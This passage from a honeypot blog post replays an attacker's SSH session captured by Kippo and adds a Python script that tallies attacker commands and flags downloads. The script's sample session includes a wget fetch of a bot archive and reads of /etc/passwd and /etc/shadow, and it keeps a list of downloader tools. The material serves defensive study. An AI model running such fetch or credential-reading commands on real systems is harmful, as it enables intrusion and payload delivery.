> drwxr-xr-x 1 root root  4096 2009-11-08 15:41 sbin
> drwxr-xr-x 1 root root  4096 2009-11-20 08:20 etc
> drwxr-xr-x 1 root root  3200 2009-11-20 08:20 dev
> drwxr-xr-x 1 root root  4096 2009-11-06 11:09 srv
> lrwxrwxrwx 1 root root    28 2009-11-06 11:16 initrd.img ->
> /boot/initrd.img-2.6.26-2-686
> drwxr-xr-x 1 root root  4096 2009-11-08 15:46 lib
> drwxr-xr-x 1 root root  4096 2009-11-06 11:22 home
> drwxr-xr-x 1 root root  4096 2009-11-06 11:09 var
> drwxr-xr-x 1 root root  4096 2009-11-08 15:46 usr
> drwxr-xr-x 1 root root  4096 2009-11-08 15:39 boot
> drwxr-xr-x 1 root root  4096 2009-11-20 09:08 root
> drwx------ 1 root root 16384 2009-11-06 11:08 lost+found
> localhost:/# cd /home
> localhost:/home# ls -l
> ldrwxr-xr-x 1 root root 4096 2013-02-03 17:11 .
> drwxr-xr-x 1 root root 4096 2013-02-03 17:11 ..
> drwxr-xr-x 1 1000 1000 4096 2009-11-06 11:22 richard
> localhost:/home# exit
> Connection to server closed.
> localhost:~# 
> localhost:~# 
> localhost:~# 
> localhost:~# 
> localhost:~# 
> localhost:~# 
> localhost:~# ssh -D root@http://60.250.65.112/ 1337
> The authenticity of host '60.250.65.112 (60.250.65.112)' can't be
> established.
> RSA key fingerprint is 9d:30:97:8a:9e:48:0d:de:04:8d:76:3a:7b:4b:30:f8.
> Are you sure you want to continue connecting (yes/no)? yes
> Warning: Permanently added '60.250.65.112' (RSA) to the list of known hosts.
> root@60.250.65.112's password: 
> Linux localhost 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686
> Last login: Sat Feb  2 07:07:11 2013 from 192.168.9.4
> localhost:~# uname -a
> Linux localhost 2.6.24-2-generic #1 SMP Thu Dec 20 17:36:12 GMT 2007 i686
> GNU/Linux
> localhost:~# pwd
> /root
> localhost:~# cd /
> localhost:/# ls -l
> drwxr-xr-x 1 root root  4096 2013-02-03 17:19 .
> drwxr-xr-x 1 root root  4096 2013-02-03 17:19 ..
> drwxr-xr-x 1 root root     0 2009-11-20 08:19 sys
> drwxr-xr-x 1 root root  4096 2009-11-08 15:42 bin
> drwxr-xr-x 1 root root  4096 2009-11-06 11:08 mnt
> drwxr-xr-x 1 root root  4096 2009-11-06 11:08 media
> lrwxrwxrwx 1 root root    25 2009-11-06 11:16 vmlinuz ->
> /boot/vmlinuz-2.6.26-2-686
> drwxr-xr-x 1 root root  4096 2009-11-06 11:09 opt
> lrwxrwxrwx 1 root root    11 2009-11-06 11:08 cdrom -> /media/cdrom0
> drwxr-xr-x 1 root root  4096 2009-11-06 11:08 selinux
> drwxrwxrwx 1 root root  4096 2009-11-20 08:19 tmp
> dr-xr-xr-x 1 root root     0 2009-11-20 08:19 proc
> drwxr-xr-x 1 root root  4096 2009-11-08 15:41 sbin
> drwxr-xr-x 1 root root  4096 2009-11-20 08:20 etc
> drwxr-xr-x 1 root root  3200 2009-11-20 08:20 dev
> drwxr-xr-x 1 root root  4096 2009-11-06 11:09 srv
> lrwxrwxrwx 1 root root    28 2009-11-06 11:16 initrd.img ->
> /boot/initrd.img-2.6.26-2-686
> drwxr-xr-x 1 root root  4096 2009-11-08 15:46 lib
> drwxr-xr-x 1 root root  4096 2009-11-06 11:22 home
> drwxr-xr-x 1 root root  4096 2009-11-06 11:09 var
> drwxr-xr-x 1 root root  4096 2009-11-08 15:46 usr
> drwxr-xr-x 1 root root  4096 2009-11-08 15:39 boot
> drwxr-xr-x 1 root root  4096 2009-11-20 09:08 root
> drwx------ 1 root root 16384 2009-11-06 11:08 lost+found
> localhost:/# cd /root
> localhost:~# ls -l
> ldrwxr-xr-x 1 root root 4096 2013-02-03 17:19 .
> drwxr-xr-x 1 root root 4096 2013-02-03 17:19 ..
> drwxr-xr-x 1 root root 4096 2009-11-06 11:16 .debtags
> -rw------- 1 root root 5515 2009-11-20 09:08 .viminfo
> drwx------ 1 root root 4096 2009-11-06 11:13 .aptitude
> -rw-r--r-- 1 root root  140 2009-11-06 11:09 .profile
> -rw-r--r-- 1 root root  412 2009-11-06 11:09 .bashrc
> localhost:~# cd /hocd /home/
> localhost:/home# ls -l
> drwxr-xr-x 1 root root 4096 2013-02-03 17:20 .
> drwxr-xr-x 1 root root 4096 2013-02-03 17:20 ..
> drwxr-xr-x 1 1000 1000 4096 2009-11-06 11:22 richard
> localhost:/home# exit
> Connection to server closed.
> localhost:~# exit
> Connection to server closed.
> localhost:~# 
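Reading replays by eye works for a handful of sessions, but the observation above (first command is almost always `w`, then `uname -a`) is the kind of thing worth checking across every session in the repo. The following is an added example, not from the post, that pulls the typed commands out of replay text in the prompt style shown above (`host:cwd# command`), counts first commands and programs across sessions, and lists the download commands so you can match them against the dl/ captures. The two transcripts are constructed in that prompt style, not real sessions.

```python
"""Added example (not from the post): extract the commands an attacker typed
from Kippo TTY replay text and summarize them across sessions. The sample
transcripts are constructed in the same prompt style as the post's replay."""
import re
from collections import Counter

# Constructed transcripts, not real captured sessions.
SAMPLE_SESSIONS = [
    """AWSWeb:~# w
 12:01:10 up 14 days,  3:22,  1 user,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    192.0.2.10        12:01    0.00s  0.00s  0.00s w
AWSWeb:~# uname -a
Linux AWSWeb 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux
AWSWeb:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
AWSWeb:~# cd /tmp
AWSWeb:/tmp# wget http://example.invalid/bot.tgz
AWSWeb:/tmp# 
AWSWeb:/tmp# exit
""",
    """AWSWeb:~# w
AWSWeb:~# uname -a
AWSWeb:~# cat /etc/shadow
cat: /etc/shadow: No such file or directory
AWSWeb:~# exit
""",
]

# A prompt is "<host>:<cwd># " or "<host>:<cwd>$ " at the start of a line.
# Command output such as passwd entries ("root:x:0:0:...") has no '#'/'$' after
# the cwd field, so it does not match.
PROMPT_RE = re.compile(r"^(?P<host>[\w.-]+):(?P<cwd>\S*)[#$] ?(?P<cmd>.*)$")

# Programs that fetch a payload onto the box; match these against dl/ captures.
DOWNLOADERS = {"wget", "curl", "ftp", "tftp", "scp"}


def extract_commands(transcript):
    """Commands typed at a prompt, in order; empty prompts are skipped."""
    cmds = []
    for line in transcript.splitlines():
        m = PROMPT_RE.match(line)
        if m and m.group("cmd").strip():
            cmds.append(m.group("cmd").strip())
    return cmds


def download_commands(transcript):
    """Only the commands whose program is a known downloader."""
    return [c for c in extract_commands(transcript) if c.split()[0] in DOWNLOADERS]


def summarize_sessions(transcripts):
    """First-command, full-command and program frequencies across sessions."""
    first = Counter()
    commands = Counter()
    programs = Counter()
    for t in transcripts:
        cmds = extract_commands(t)
        if cmds:
            first[cmds[0]] += 1
        commands.update(cmds)
        programs.update(c.split()[0] for c in cmds)
    return {
        "sessions": len(transcripts),
        "first_command": first.most_common(),
        "commands": commands.most_common(),
        "programs": programs.most_common(),
    }


if __name__ == "__main__":
    import sys
    # Pass one or more replay text files, or run without arguments on the sample.
    sessions = [open(p).read() for p in sys.argv[1:]] or SAMPLE_SESSIONS
    report = summarize_sessions(sessions)
    print("sessions: %d" % report["sessions"])
    print("first command: %s" % report["first_command"])
    print("top programs: %s" % report["programs"][:10])
    for t in sessions:
        for c in download_commands(t):
            print("download: %s" % c)
```

The prompt regex is tuned to the `host:cwd#` style in the replay above; a honeypot configured with a different prompt needs the pattern adjusted, and any command output that happens to look like a prompt will be miscounted, so spot-check the extracted list against a raw replay before trusting the aggregate.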

CONCLUSION:

After a year with Kippo, I have learned a lot about what these basic attackers
do when connecting to seemingly open SSH hosts. There is plenty more to learn,
though. I have some plans on building out a larger honeypot infrastructure and
automating some of the data collection and parsing. Additionally, I would like
to spend more time analyzing the sessions and malware for further trends. I'll
keep you all posted!

*Big thanks to Bruteforce Labs for their tools and expertise in honeypots.

Admin | 1 Comment | Share Article
tagged Kippo, Pipal, honeypot, python, ssh in News


Copyright © 2011, TekDefense. All rights reserved.